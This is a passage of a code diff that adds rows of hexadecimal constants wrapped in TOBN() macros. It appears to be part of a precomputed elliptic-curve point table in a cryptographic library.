+     TOBN(0xe68cbec4, 0x86076bcb), TOBN(0xf9e7c0c0, 0xcd6cd286),
+     TOBN(0x65994ddb, 0x0f5f27ca), TOBN(0xe85461fb, 0xa80d59ff),
+     TOBN(0xff05481a, 0x66601023), TOBN(0xc665427a, 0xfc9ebbfb),
+     TOBN(0xb0571a69, 0x7587fd52), TOBN(0x935289f8, 0x8d49efce),
+     TOBN(0x61becc60, 0xea420688), TOBN(0xb22639d9, 0x13a786af),
+     TOBN(0x1a8e6220, 0x361ecf90), TOBN(0x001f23e0, 0x25506463),
+     TOBN(0xe4ae9b5d, 0x0a5c2b79), TOBN(0xebc9cdad, 0xd8149db5),
+     TOBN(0xb33164a1, 0x934aa728), TOBN(0x750eb00e, 0xae9b60f3),
+     TOBN(0x5a91615b, 0x9b9cfbfd), TOBN(0x97015cbf, 0xef45f7f6),
+     TOBN(0xb462c4a5, 0xbf5151df), TOBN(0x21adcc41, 0xb07118f2),
+     TOBN(0xd60c545b, 0x043fa42c), TOBN(0xfc21aa54, 0xe96be1ab),
+     TOBN(0xe84bc32f, 0x4e51ea80), TOBN(0x3dae45f0, 0x259b5d8d),
+     TOBN(0xbb73c7eb, 0xc38f1b5e), TOBN(0xe405a74a, 0xe8ae617d),
+     TOBN(0xbb1ae9c6, 0x9f1c56bd), TOBN(0x8c176b98, 0x49f196a4),
+     TOBN(0xc448f311, 0x6875092b), TOBN(0xb5afe3de, 0x9f976033),
+     TOBN(0xa8dafd49, 0x145813e5), TOBN(0x687fc4d9, 0xe2b34226),
+     TOBN(0xf2dfc92d, 0x4c7ff57f), TOBN(0x004e3fc1, 0x401f1b46),
+     TOBN(0x5afddab6, 0x1430c9ab), TOBN(0x0bdd41d3, 0x2238e997),
+     TOBN(0xf0947430, 0x418042ae), TOBN(0x71f9adda, 0xcdddc4cb),
+     TOBN(0x7090c016, 0xc52dd907), TOBN(0xd9bdf44d, 0x29e2047f),
+     TOBN(0xe6f1fe80, 0x1b1011a6), TOBN(0xb63accbc, 0xd9acdc78),
+     TOBN(0xcfc7e235, 0x1272a95b), TOBN(0x0c667717, 0xa6276ac8),
+     TOBN(0x3c0d3709, 0xe2d7eef7), TOBN(0x5add2b06, 0x9a685b3e),
+     TOBN(0x363ad32d, 0x14ea5d65), TOBN(0xf8e01f06, 0x8d7dd506),
+     TOBN(0xc9ea2213, 0x75b4aac6), TOBN(0xed2a2bf9, 0x0d353466),
+     TOBN(0x439d79b5, 0xe9d3a7c3), TOBN(0x8e0ee5a6, 0x81b7f34b),
+     TOBN(0xcf3dacf5, 0x1dc4ba75), TOBN(0x1d3d1773, 0xeb3310c7),
+     TOBN(0xa8e67112, 0x7747ae83), TOBN(0x31f43160, 0x197d6b40),
+     TOBN(0x0521ccee, 0xcd961400), TOBN(0x67246f11, 0xf6535768),
+     TOBN(0x702fcc5a, 0xef0c3133), TOBN(0x247cc45d, 0x7e16693b),
+     TOBN(0xfd484e49, 0xc729b749), TOBN(0x522cef7d, 0xb218320f),
+     TOBN(0xe56ef405, 0x59ab93b3), TOBN(0x225fba11, 0x9f181071),
+     TOBN(0x33bd6595, 0x15330ed0), TOBN(0xc4be69d5, 0x1ddb32f7),
+     TOBN(0x264c7668, 0x0448087c), TOBN(0xac30903f, 0x71432dae),
+     TOBN(0x3851b266, 0x00f9bf47), TOBN(0x400ed311, 0x6cdd6d03),
+     TOBN(0x045e79fe, 0xf8fd2424), TOBN(0xfdfd974a, 0xfa6da98b),
+     TOBN(0x45c9f641, 0x0c1e673a), TOBN(0x76f2e733, 0x5b2c5168),
+     TOBN(0x1adaebb5, 0x2a601753), TOBN(0xb286514c, 0xc57c2d49),
+     TOBN(0xd8769670, 0x1e0bfd24), TOBN(0x950c547e, 0x04478922),
+     TOBN(0xd1d41969, 0xe5d32bfe), TOBN(0x30bc1472, 0x750d6c3e),
+     TOBN(0x8f3679fe, 0xe0e27f3a), TOBN(0x8f64a7dc, 0xa4a6ee0c),
+     TOBN(0x2fe59937, 0x633dfb1f), TOBN(0xea82c395, 0x977f2547),
+     TOBN(0xcbdfdf1a, 0x661ea646), TOBN(0xc7ccc591, 0xb9085451),
+     TOBN(0x82177962, 0x81761e13), TOBN(0xda57596f, 0x9196885c),
+     TOBN(0xbc17e849, 0x28ffbd70), TOBN(0x1e6e0a41, 0x2671d36f),
+     TOBN(0x61ae872c, 0x4152fcf5), TOBN(0x441c87b0, 0x9e77e754),
+     TOBN(0xd0799dd5, 0xa34dff09), TOBN(0x766b4e44, 0x88a6b171),
+     TOBN(0xdc06a512, 0x11f1c792), TOBN(0xea02ae93, 0x4be35c3e),
+     TOBN(0xe5ca4d6d, 0xe90c469e), TOBN(0x4df4368e, 0x56e4ff5c),
+     TOBN(0x7817acab, 0x4baef62e), TOBN(0x9f5a2202, 0xa85b91e8),
+     TOBN(0x9666ebe6, 0x6ce57610), TOBN(0x32ad31f3, 0xf73bfe03),
+     TOBN(0x628330a4, 0x25bcf4d6), TOBN(0xea950593, 0x515056e6),
+     TOBN(0x59811c89, 0xe1332156), TOBN(0xc89cf1fe, 0x8c11b2d7),
+     TOBN(0x75b63913, 0x04e60cc0), TOBN(0xce811e8d, 0x4625d375),
+     TOBN(0x030e43fc, 0x2d26e562), TOBN(0xfbb30b4b, 0x608d36a0),
+     TOBN(0x634ff82c, 0x48528118), TOBN(0x7c6fe085, 0xcd285911),
+     TOBN(0x7f2830c0, 0x99358f28), TOBN(0x2e60a95e, 0x665e6c09),
+     TOBN(0x08407d3d, 0x9b785dbf), TOBN(0x530889ab, 0xa759bce7),
+     TOBN(0xf228e0e6, 0x52f61239), TOBN(0x2b6d1461, 0x6879be3c),
+     TOBN(0xe6902c04, 0x51a7bbf7), TOBN(0x30ad99f0, 0x76f24a64),
+     TOBN(0x66d9317a, 0x98bc6da0), TOBN(0xf4f877f3, 0xcb596ac0),
+     TOBN(0xb05ff62d, 0x4c44f119), TOBN(0x4555f536, 0xe9b77416),
+     TOBN(0xc7c0d059, 0x8caed63b), TOBN(0x0cd2b7ce, 0xc358b2a9),
+     TOBN(0x3f33287b, 0x46945fa3), TOBN(0xf8785b20, 0xd67c8791),
+     TOBN(0xc54a7a61, 0x9637bd08), TOBN(0x54d4598c, 0x18be79d7),
+     TOBN(0x889e5acb, 0xc46d7ce1), TOBN(0x9a515bb7, 0x8b085877),
+     TOBN(0xfac1a03d, 0x0b7a5050), TOBN(0x7d3e738a, 0xf2926035),
+     TOBN(0x861cc2ce, 0x2a6cb0eb), TOBN(0x6f2e2955, 0x8f7adc79),
+     TOBN(0x61c4d451, 0x33016376), TOBN(0xd9fd2c80, 0x5ad59090),
+     TOBN(0xe5a83738, 0xb2b836a1), TOBN(0x855b41a0, 0x7c0d6622),
+     TOBN(0x186fe317, 0x7cc19af1), TOBN(0x6465c1ff, 0xfdd99acb),
+     TOBN(0x46e5c23f, 0x6974b99e), TOBN(0x75a7cf8b, 0xa2717cbe),
+     TOBN(0x4d2ebc3f, 0x062be658), TOBN(0x094b4447, 0x5f209c98),
+     TOBN(0x4af285ed, 0xb940cb5a), TOBN(0x6706d792, 0x7cc82f10),
+     TOBN(0xc8c8776c, 0x030526fa), TOBN(0xfa8e6f76, 0xa0da9140),
+     TOBN(0x77ea9d34, 0x591ee4f0), TOBN(0x5f46e337, 0x40274166),
+     TOBN(0x1bdf98bb, 0xea671457), TOBN(0xd7c08b46, 0x862a1fe2),
+     TOBN(0x46cc303c, 0x1c08ad63), TOBN(0x99543440, 0x4c845e7b),
+     TOBN(0x1b8fbdb5, 0x48f36bf7), TOBN(0x5b82c392, 0x8c8273a7),
+     TOBN(0x08f712c4, 0x928435d5), TOBN(0x071cf0f1, 0x79330380),
+     TOBN(0xc74c2d24, 0xa8da054a), TOBN(0xcb0e7201, 0x43c46b5c),
+     TOBN(0x0ad7337a, 0xc0b7eff3), TOBN(0x8552225e, 0xc5e48b3c),
+     TOBN(0xe6f78b0c, 0x73f13a5f), TOBN(0x5e70062e, 0x82349cbe),
+     TOBN(0x6b8d5048, 0xe7073969), TOBN(0x392d2a29, 0xc33cb3d2),
+     TOBN(0xee4f727c, 0x4ecaa20f), TOBN(0xa068c99e, 0x2ccde707),
+     TOBN(0xfcd5651f, 0xb87a2913), TOBN(0xea3e3c15, 0x3cc252f0),
+     TOBN(0x777d92df, 0x3b6cd3e4), TOBN(0x7a414143, 0xc5a732e7),
+     TOBN(0xa895951a, 0xa71ff493), TOBN(0xfe980c92, 0xbbd37cf6),
+     TOBN(0x45bd5e64, 0xdecfeeff), TOBN(0x910dc2a9, 0xa44c43e9),
+     TOBN(0xcb403f26, 0xcca9f54d), TOBN(0x928bbdfb, 0x9303f6db),
+     TOBN(0x3c37951e, 0xa9eee67c), TOBN(0x3bd61a52, 0xf79961c3),
+     TOBN(0x09a238e6, 0x395c9a79), TOBN(0x6940ca2d, 0x61eb352d),
+     TOBN(0x7d1e5c5e, 0xc1875631), TOBN(0x1e19742c, 0x1e1b20d1),
+     TOBN(0x4633d908, 0x23fc2e6e), TOBN(0xa76e29a9, 0x08959149),
+     TOBN(0x61069d9c, 0x84ed7da5), TOBN(0x0baa11cf, 0x5dbcad51),
+     TOBN(0xd01eec64, 0x961849da), TOBN(0x93b75f1f, 0xaf3d8c28),
+     TOBN(0x57bc4f9f, 0x1ca2ee44), TOBN(0x5a26322d, 0x00e00558),
+     TOBN(0x1888d658, 0x61a023ef), TOBN(0x1d72aab4, 0xb9e5246e),
+     TOBN(0xa9a26348, 0xe5563ec0), TOBN(0xa0971963, 0xc3439a43),
+     TOBN(0x567dd54b, 0xadb9b5b7), TOBN(0x73fac1a1, 0xc45a524b),
+     TOBN(0x8fe97ef7, 0xfe38e608), TOBN(0x608748d2, 0x3f384f48),
+     TOBN(0xb0571794, 0xc486094f), TOBN(0x869254a3, 0x8bf3a8d6),
+     TOBN(0x148a8dd1, 0x310b0e25), TOBN(0x99ab9f3f, 0x9aa3f7d8),
+     TOBN(0x0927c68a, 0x6706c02e), TOBN(0x22b5e76c, 0x69790e6c),
+     TOBN(0x6c325260, 0x6c71376c), TOBN(0x53a57690, 0x09ef6657),
+     TOBN(0x8d63f852, 0xedffcf3a), TOBN(0xb4d2ed04, 0x3c0a6f55),
+     TOBN(0xdb3aa8de, 0x12519b9e), TOBN(0x5d38e9c4, 0x1e0a569a),
+     TOBN(0x871528bf, 0x303747e2), TOBN(0xa208e77c, 0xf5b5c18d),
+     TOBN(0x9d129c88, 0xca6bf923), TOBN(0xbcbf197f, 0xbf02839f),
+     TOBN(0x9b9bf030, 0x27323194), TOBN(0x3b055a8b, 0x339ca59d),
+     TOBN(0xb46b2312, 0x0f669520), TOBN(0x19789f1f, 0x497e5f24),
+     TOBN(0x9c499468, 0xaaf01801), TOBN(0x72ee1190, 0x8b69d59c),
+     TOBN(0x8bd39595, 0xacf4c079), TOBN(0x3ee11ece, 0x8e0cd048),
+     TOBN(0xebde86ec, 0x1ed66f18), TOBN(0x225d906b, 0xd61fce43),
+     TOBN(0x5cab07d6, 0xe8bed74d), TOBN(0x16e4617f, 0x27855ab7),
+     TOBN(0x6568aadd, 0xb2fbc3dd), TOBN(0xedb5484f, 0x8aeddf5b),
+     TOBN(0x878f20e8, 0x6dcf2fad), TOBN(0x3516497c, 0x615f5699),}
+    ,
+    {TOBN(0xef0a3fec, 0xfa181e69), TOBN(0x9ea02f81, 0x30d69a98),
+     TOBN(0xb2e9cf8e, 0x66eab95d), TOBN(0x520f2beb, 0x24720021),
+     TOBN(0x621c540a, 0x1df84361), TOBN(0x12037721, 0x71fa6d5d),
+     TOBN(0x6e3c7b51, 0x0ff5f6ff), TOBN(0x817a069b, 0xabb2bef3),
+     TOBN(0x83572fb6, 0xb294cda6), TOBN(0x6ce9bf75, 0xb9039f34),
+     TOBN(0x20e012f0, 0x095cbb21), TOBN(0xa0aecc1b, 0xd063f0da),
+     TOBN(0x57c21c3a, 0xf02909e5), TOBN(0xc7d59ecf, 0x48ce9cdc),
+     TOBN(0x2732b844, 0x8ae336f8), TOBN(0x056e3723, 0x3f4f85f4),
+     TOBN(0x8a10b531, 0x89e800ca), TOBN(0x50fe0c17, 0x145208fd),
+     TOBN(0x9e43c0d3, 0xb714ba37), TOBN(0x427d200e, 0x34189acc),
+     TOBN(0x05dee24f, 0xe616e2c0), TOBN(0x9c25f4c8, 0xee1854c1),
+     TOBN(0x4d3222a5, 0x8f342a73), TOBN(0x0807804f, 0xa027c952),
+     TOBN(0xc222653a, 0x4f0d56f3), TOBN(0x961e4047, 0xca28b805),
+     TOBN(0x2c03f8b0, 0x4a73434b), TOBN(0x4c966787, 0xab712a19),
+     TOBN(0xcc196c42, 0x864fee42), TOBN(0xc1be93da, 0x5b0ece5c),
+     TOBN(0xa87d9f22, 0xc131c159), TOBN(0x2bb6d593, 0xdce45655),
+     TOBN(0x22c49ec9, 0xb809b7ce), TOBN(0x8a41486b, 0xe2c72c2c),
+     TOBN(0x813b9420, 0xfea0bf36), TOBN(0xb3d36ee9, 0xa66dac69),
+     TOBN(0x6fddc08a, 0x328cc987), TOBN(0x0a3bcd2c, 0x3a326461),
+     TOBN(0x7103c49d, 0xd810dbba), TOBN(0xf9d81a28, 0x4b78a4c4),
+     TOBN(0x3de865ad, 0xe4d55941), TOBN(0xdedafa5e, 0x30384087),
+     TOBN(0x6f414abb, 0x4ef18b9b), TOBN(0x9ee9ea42, 0xfaee5268),
+     TOBN(0x260faa16, 0x37a55a4a), TOBN(0xeb19a514, 0x015f93b9),
+     TOBN(0x51d7ebd2, 0x9e9c3598), TOBN(0x523fc56d, 0x1932178e),
+     TOBN(0x501d070c, 0xb98fe684), TOBN(0xd60fbe9a, 0x124a1458),
+     TOBN(0xa45761c8, 0x92bc6b3f), TOBN(0xf5384858, 0xfe6f27cb),
+     TOBN(0x4b0271f7, 0xb59e763b), TOBN(0x3d4606a9, 0x5b5a8e5e),
+     TOBN(0x1eda5d9b, 0x05a48292), TOBN(0xda7731d0, 0xe6fec446),
+     TOBN(0xa3e33693, 0x90d45871), TOBN(0xe9764040, 0x06166d8d),
+     TOBN(0xb5c33682, 0x89a90403), TOBN(0x4bd17983, 0x72f1d637),
+     TOBN(0xa616679e, 0xd5d2c53a), TOBN(0x5ec4bcd8, 0xfdcf3b87),
+     TOBN(0xae6d7613, 0xb66a694e), TOBN(0x7460fc76, 0xe3fc27e5),
+     TOBN(0x70469b82, 0x95caabee), TOBN(0xde024ca5, 0x889501e3),
+     TOBN(0x6bdadc06, 0x076ed265), TOBN(0x0cb1236b, 0x5a0ef8b2),
+     TOBN(0x4065ddbf, 0x0972ebf9), TOBN(0xf1dd3875, 0x22aca432),
+     TOBN(0xa88b97cf, 0x744aff76), TOBN(0xd1359afd, 0xfe8e3d24),
+     TOBN(0x52a3ba2b, 0x91502cf3), TOBN(0x2c3832a8, 0x084db75d),
+     TOBN(0x04a12ddd, 0xde30b1c9), TOBN(0x7802eabc, 0xe31fd60c),
+     TOBN(0x33707327, 0xa37fddab), TOBN(0x65d6f2ab, 0xfaafa973),
+     TOBN(0x3525c5b8, 0x11e6f91a), TOBN(0x76aeb0c9, 0x5f46530b),
+     TOBN(0xe8815ff6, 0x2f93a675), TOBN(0xa6ec9684, 0x05f48679),
+     TOBN(0x6dcbb556, 0x358ae884), TOBN(0x0af61472, 0xe19e3873),
+     TOBN(0x72334372, 0xa5f696be), TOBN(0xc65e57ea, 0x6f22fb70),
+     TOBN(0x268da30c, 0x946cea90), TOBN(0x136a8a87, 0x65681b2a),
+     TOBN(0xad5e81dc, 0x0f9f44d4), TOBN(0xf09a6960, 0x2c46585a),
+     TOBN(0xd1649164, 0xc447d1b1), TOBN(0x3b4b36c8, 0x879dc8b1),
+     TOBN(0x20d4177b, 0x3b6b234c), TOBN(0x096a2505, 0x1730d9d0),
+     TOBN(0x0611b9b8, 0xef80531d), TOBN(0xba904b3b, 0x64bb495d),
+     TOBN(0x1192d9d4, 0x93a3147a), TOBN(0x9f30a5dc, 0x9a565545),
+     TOBN(0x90b1f9cb, 0x6ef07212), TOBN(0x29958546, 0x0d87fc13),
+     TOBN(0xd3323eff, 0xc17db9ba), TOBN(0xcb18548c, 0xcb1644a8),
+     TOBN(0x18a306d4, 0x4f49ffbc), TOBN(0x28d658f1, 0x4c2e8684),
+     TOBN(0x44ba60cd, 0xa99f8c71), TOBN(0x67b7abdb, 0x4bf742ff),
+     TOBN(0x66310f9c, 0x914b3f99), TOBN(0xae430a32, 0xf412c161),
+     TOBN(0x1e6776d3, 0x88ace52f), TOBN(0x4bc0fa24, 0x52d7067d),
+     TOBN(0x03c286aa, 0x8f07cd1b), TOBN(0x4cb8f38c, 0xa985b2c1),
+     TOBN(0x83ccbe80, 0x8c3bff36), TOBN(0x005a0bd2, 0x5263e575),
+     TOBN(0x460d7dda, 0x259bdcd1), TOBN(0x4a1c5642, 0xfa5cab6b),
+     TOBN(0x2b7bdbb9, 0x9fe4fc88), TOBN(0x09418e28, 0xcc97bbb5),
+     TOBN(0xd8274fb4, 0xa12321ae), TOBN(0xb137007d, 0x5c87b64e),
+     TOBN(0x80531fe1, 0xc63c4962), TOBN(0x50541e89, 0x981fdb25),
+     TOBN(0xdc1291a1, 0xfd4c2b6b), TOBN(0xc0693a17, 0xa6df4fca),
+     TOBN(0xb2c4604e, 0x0117f203), TOBN(0x245f1963, 0x0a99b8d0),
+     TOBN(0xaedc20aa, 0xc6212c44), TOBN(0xb1ed4e56, 0x520f52a8),
+     TOBN(0xfe48f575, 0xf8547be3), TOBN(0x0a7033cd, 0xa9e45f98),
+     TOBN(0x4b45d3a9, 0x18c50100), TOBN(0xb2a6cd6a, 0xa61d41da),
+     TOBN(0x60bbb4f5, 0x57933c6b), TOBN(0xa7538ebd, 0x2b0d7ffc),
+     TOBN(0x9ea3ab8d, 0x8cd626b6), TOBN(0x8273a484, 0x3601625a),
+     TOBN(0x88859845, 0x0168e508), TOBN(0x8cbc9bb2, 0x99a94abd),
+     TOBN(0x713ac792, 0xfab0a671), TOBN(0xa3995b19, 0x6c9ebffc),
+     TOBN(0xe711668e, 0x1239e152), TOBN(0x56892558, 0xbbb8dff4),
+     TOBN(0x8bfc7dab, 0xdbf17963), TOBN(0x5b59fe5a, 0xb3de1253),
+     TOBN(0x7e3320eb, 0x34a9f7ae), TOBN(0xe5e8cf72, 0xd751efe4),
+     TOBN(0x7ea003bc, 0xd9be2f37), TOBN(0xc0f551a0, 0xb6c08ef7),
+     TOBN(0x56606268, 0x038f6725), TOBN(0x1dd38e35, 0x6d92d3b6),
+     TOBN(0x07dfce7c, 0xc3cbd686), TOBN(0x4e549e04, 0x651c5da8),
+     TOBN(0x4058f93b, 0x08b19340), TOBN(0xc2fae6f4, 0xcac6d89d),
+     TOBN(0x4bad8a8c, 0x8f159cc7), TOBN(0x0ddba4b3, 0xcb0b601c),
+     TOBN(0xda4fc7b5, 0x1dd95f8c), TOBN(0x1d163cd7, 0xcea5c255),
+     TOBN(0x30707d06, 0x274a8c4c), TOBN(0x79d9e008, 0x2802e9ce),
+     TOBN(0x02a29ebf, 0xe6ddd505), TOBN(0x37064e74, 0xb50bed1a),
+     TOBN(0x3f6bae65, 0xa7327d57), TOBN(0x3846f5f1, 0xf83920bc),
+     TOBN(0x87c37491, 0x60df1b9b), TOBN(0x4cfb2895, 0x2d1da29f),
+     TOBN(0x10a478ca, 0x4ed1743c), TOBN(0x390c6030, 0x3edd47c6),
+     TOBN(0x8f3e5312, 0x8c0a78de), TOBN(0xccd02bda, 0x1e85df70),
+     TOBN(0xd6c75c03, 0xa61b6582), TOBN(0x0762921c, 0xfc0eebd1),
+     TOBN(0xd34d0823, 0xd85010c0), TOBN(0xd73aaacb, 0x0044cf1f),
+     TOBN(0xfb4159bb, 0xa3b5e78a), TOBN(0x2287c7f7, 0xe5826f3f),
+     TOBN(0x4aeaf742, 0x580b1a01), TOBN(0xf080415d, 0x60423b79),
+     TOBN(0xe12622cd, 0xa7dea144), TOBN(0x49ea4996, 0x59d62472),
+     TOBN(0xb42991ef, 0x571f3913), TOBN(0x0610f214, 0xf5b25a8a),
+     TOBN(0x47adc585, 0x30b79e8f), TOBN(0xf90e3df6, 0x07a065a2),
+     TOBN(0x5d0a5deb, 0x43e2e034), TOBN(0x53fb5a34, 0x444024aa),
+     TOBN(0xa8628c68, 0x6b0c9f7f), TOBN(0x9c69c29c, 0xac563656),
+     TOBN(0x5a231feb, 0xbace47b6), TOBN(0xbdce0289, 0x9ea5a2ec),
+     TOBN(0x05da1fac, 0x9463853e), TOBN(0x96812c52, 0x509e78aa),
+     TOBN(0xd3fb5771, 0x57151692), TOBN(0xeb2721f8, 0xd98e1c44),
+     TOBN(0xc0506087, 0x32399be1), TOBN(0xda5a5511, 0xd979d8b8),
+     TOBN(0x737ed55d, 0xc6f56780), TOBN(0xe20d3004, 0x0dc7a7f4),
+     TOBN(0x02ce7301, 0xf5941a03), TOBN(0x91ef5215, 0xed30f83a),
+     TOBN(0x28727fc1, 0x4092d85f), TOBN(0x72d223c6, 0x5c49e41a),
+     TOBN(0xa7cf30a2, 0xba6a4d81), TOBN(0x7c086209, 0xb030d87d),
+     TOBN(0x04844c7d, 0xfc588b09), TOBN(0x728cd499, 0x5874bbb0),
+     TOBN(0xcc1281ee, 0xe84c0495), TOBN(0x0769b5ba, 0xec31958f),
+     TOBN(0x665c228b, 0xf99c2471), TOBN(0xf2d8a11b, 0x191eb110),
+     TOBN(0x4594f494, 0xd36d7024), TOBN(0x482ded8b, 0xcdcb25a1),
+     TOBN(0xc958a9d8, 0xdadd4885), TOBN(0x7004477e, 0xf1d2b547),
+     TOBN(0x0a45f6ef, 0x2a0af550), TOBN(0x4fc739d6, 0x2f8d6351),
+     TOBN(0x75cdaf27, 0x786f08a9), TOBN(0x8700bb26, 0x42c2737f),
+     TOBN(0x855a7141, 0x1c4e2670), TOBN(0x810188c1, 0x15076fef),
+     TOBN(0xc251d0c9, 0xabcd3297), TOBN(0xae4c8967, 0xf48108eb),
+     TOBN(0xbd146de7, 0x18ceed30), TOBN(0xf9d4f07a, 0xc986bced),
+     TOBN(0x5ad98ed5, 0x83fa1e08), TOBN(0x7780d33e, 0xbeabd1fb),
+     TOBN(0xe330513c, 0x903b1196), TOBN(0xba11de9e, 0xa47bc8c4),
+     TOBN(0x684334da, 0x02c2d064), TOBN(0x7ecf360d, 0xa48de23b),
+     TOBN(0x57a1b474, 0x0a9089d8), TOBN(0xf28fa439, 0xff36734c),
+     TOBN(0xf2a482cb, 0xea4570b3), TOBN(0xee65d68b, 0xa5ebcee9),
+     TOBN(0x988d0036, 0xb9694cd5), TOBN(0x53edd0e9, 0x37885d32),
+     TOBN(0xe37e3307, 0xbeb9bc6d), TOBN(0xe9abb907, 0x9f5c6768),
+     TOBN(0x4396ccd5, 0x51f2160f), TOBN(0x2500888c, 0x47336da6),
+     TOBN(0x383f9ed9, 0x926fce43), TOBN(0x809dd1c7, 0x04da2930),
+     TOBN(0x30f6f596, 0x8a4cb227), TOBN(0x0d700c7f, 0x73a56b38),
+     TOBN(0x1825ea33, 0xab64a065), TOBN(0xaab9b735, 0x1338df80),
+     TOBN(0x1516100d, 0x9b63f57f), TOBN(0x2574395a, 0x27a6a634),
+     TOBN(0xb5560fb6, 0x700a1acd), TOBN(0xe823fd73, 0xfd999681),
+     TOBN(0xda915d1f, 0x6cb4e1ba), TOBN(0x0d030118, 0x6ebe00a3),
+     TOBN(0x744fb0c9, 0x89fca8cd), TOBN(0x970d01db, 0xf9da0e0b),
+     TOBN(0x0ad8c564, 0x7931d76f), TOBN(0xb15737bf, 0xf659b96a),
+     TOBN(0xdc9933e8, 0xa8b484e7), TOBN(0xb2fdbdf9, 0x7a26dec7),
+     TOBN(0x2349e9a4, 0x9f1f0136), TOBN(0x7860368e, 0x70fddddb),
+     TOBN(0xd93d2c1c, 0xf9ad3e18), TOBN(0x6d6c5f17, 0x689f4e79),
+     TOBN(0x7a544d91, 0xb24ff1b6), TOBN(0x3e12a5eb, 0xfe16cd8c),
+     TOBN(0x543574e9, 0xa56b872f), TOBN(0xa1ad550c, 0xfcf68ea2),
+     TOBN(0x689e37d2, 0x3f560ef7), TOBN(0x8c54b9ca, 0xc9d47a8b),
+     TOBN(0x46d40a4a, 0x088ac342), TOBN(0xec450c7c, 0x1576c6d0),
+     TOBN(0xb589e31c, 0x1f9689e9), TOBN(0xdacf2602, 0xb8781718),
+     TOBN(0xa89237c6, 0xc8cb6b42), TOBN(0x1326fc93, 0xb96ef381),
+     TOBN(0x55d56c6d, 0xb5f07825), TOBN(0xacba2eea, 0x7449e22d),
+     TOBN(0x74e0887a, 0x633c3000), TOBN(0xcb6cd172, 0xd7cbcf71),
+     TOBN(0x309e81de, 0xc36cf1be), TOBN(0x07a18a6d, 0x60ae399b),
+     TOBN(0xb36c2679, 0x9edce57e), TOBN(0x52b892f4, 0xdf001d41),
+     TOBN(0xd884ae5d, 0x16a1f2c6), TOBN(0x9b329424, 0xefcc370a),
+     TOBN(0x3120daf2, 0xbd2e21df), TOBN(0x55298d2d, 0x02470a99),
+     TOBN(0x0b78af6c, 0xa05db32e), TOBN(0x5c76a331, 0x601f5636),
+     TOBN(0xaae861ff, 0xf8a4f29c), TOBN(0x70dc9240, 0xd68f8d49),
+     TOBN(0x960e649f, 0x81b1321c), TOBN(0x3d2c801b, 0x8792e4ce),
+     TOBN(0xf479f772, 0x42521876), TOBN(0x0bed93bc, 0x416c79b1),
+     TOBN(0xa67fbc05, 0x263e5bc9), TOBN(0x01e8e630, 0x521db049),
+     TOBN(0x76f26738, 0xc6f3431e), TOBN(0xe609cb02, 0xe3267541),
+     TOBN(0xb10cff2d, 0x818c877c), TOBN(0x1f0e75ce, 0x786a13cb),
+     TOBN(0xf4fdca64, 0x1158544d), TOBN(0x5d777e89, 0x6cb71ed0),
+     TOBN(0x3c233737, 0xa9aa4755), TOBN(0x7b453192, 0xe527ab40),
+     TOBN(0xdb59f688, 0x39f05ffe), TOBN(0x8f4f4be0, 0x6d82574e),
+     TOBN(0xcce3450c, 0xee292d1b), TOBN(0xaa448a12, 0x61ccd086),
+     TOBN(0xabce91b3, 0xf7914967), TOBN(0x4537f09b, 0x1908a5ed),
+     TOBN(0xa812421e, 0xf51042e7), TOBN(0xfaf5cebc, 0xec0b3a34),
+     TOBN(0x730ffd87, 0x4ca6b39a), TOBN(0x70fb72ed, 0x02efd342),
+     TOBN(0xeb4735f9, 0xd75c8edb), TOBN(0xc11f2157, 0xc278aa51),
+     TOBN(0xc459f635, 0xbf3bfebf), TOBN(0x3a1ff0b4, 0x6bd9601f),
+     TOBN(0xc9d12823, 0xc420cb73), TOBN(0x3e9af3e2, 0x3c2915a3),
+     TOBN(0xe0c82c72, 0xb41c3440), TOBN(0x175239e5, 0xe3039a5f),
+     TOBN(0xe1084b8a, 0x558795a3), TOBN(0x328d0a1d, 0xd01e5c60),
+     TOBN(0x0a495f2e, 0xd3788a04), TOBN(0x25d8ff16, 0x66c11a9f),
+     TOBN(0xf5155f05, 0x9ed692d6), TOBN(0x954fa107, 0x4f425fe4),
+     TOBN(0xd16aabf2, 0xe98aaa99), TOBN(0x90cd8ba0, 0x96b0f88a),
+     TOBN(0x957f4782, 0xc154026a), TOBN(0x54ee0734, 0x52af56d2),
+     TOBN(0xbcf89e54, 0x45b4147a), TOBN(0x3d102f21, 0x9a52816c),
+     TOBN(0x6808517e, 0x39b62e77), TOBN(0x92e25421, 0x69169ad8),
+     TOBN(0xd721d871, 0xbb608558), TOBN(0x60e4ebae, 0xf6d4ff9b),
+     TOBN(0x0ba10819, 0x41f2763e), TOBN(0xca2e45be, 0x51ee3247),
+     TOBN(0x66d172ec, 0x2bfd7a5f), TOBN(0x528a8f2f, 0x74d0b12d),
+     TOBN(0xe17f1e38, 0xdabe70dc), TOBN(0x1d5d7316, 0x9f93983c),
+     TOBN(0x51b2184a, 0xdf423e31), TOBN(0xcb417291, 0xaedb1a10),
+     TOBN(0x2054ca93, 0x625bcab9), TOBN(0x54396860, 0xa98998f0),
+     TOBN(0x4e53f6c4, 0xa54ae57e), TOBN(0x0ffeb590, 0xee648e9d),
+     TOBN(0xfbbdaadc, 0x6afaf6bc), TOBN(0xf88ae796, 0xaa3bfb8a),
+     TOBN(0x209f1d44, 0xd2359ed9), TOBN(0xac68dd03, 0xf3544ce2),
+     TOBN(0xf378da47, 0xfd51e569), TOBN(0xe1abd860, 0x2cc80097),
+     TOBN(0x23ca18d9, 0x343b6e3a), TOBN(0x480797e8, 0xb40a1bae),
+     TOBN(0xd1f0c717, 0x533f3e67), TOBN(0x44896970, 0x06e6cdfc),
+     TOBN(0x8ca21055, 0x52a82e8d), TOBN(0xb2caf785, 0x78460cdc),
+     TOBN(0x4c1b7b62, 0xe9037178), TOBN(0xefc09d2c, 0xdb514b58),
+     TOBN(0x5f2df9ee, 0x9113be5c), TOBN(0x2fbda78f, 0xb3f9271c),
+     TOBN(0xe09a81af, 0x8f83fc54), TOBN(0x06b13866, 0x8afb5141),
+     TOBN(0x38f6480f, 0x43e3865d), TOBN(0x72dd77a8, 0x1ddf47d9),
+     TOBN(0xf2a8e971, 0x4c205ff7), TOBN(0x46d449d8, 0x9d088ad8),
+     TOBN(0x926619ea, 0x185d706f), TOBN(0xe47e02eb, 0xc7dd7f62),
+     TOBN(0xe7f120a7, 0x8cbc2031), TOBN(0xc18bef00, 0x998d4ac9),
+     TOBN(0x18f37a9c, 0x6bdf22da), TOBN(0xefbc432f, 0x90dc82df),
+     TOBN(0xc52cef8e, 0x5d703651), TOBN(0x82887ba0, 0xd99881a5),
+     TOBN(0x7cec9dda, 0xb920ec1d), TOBN(0xd0d7e8c3, 0xec3e8d3b),
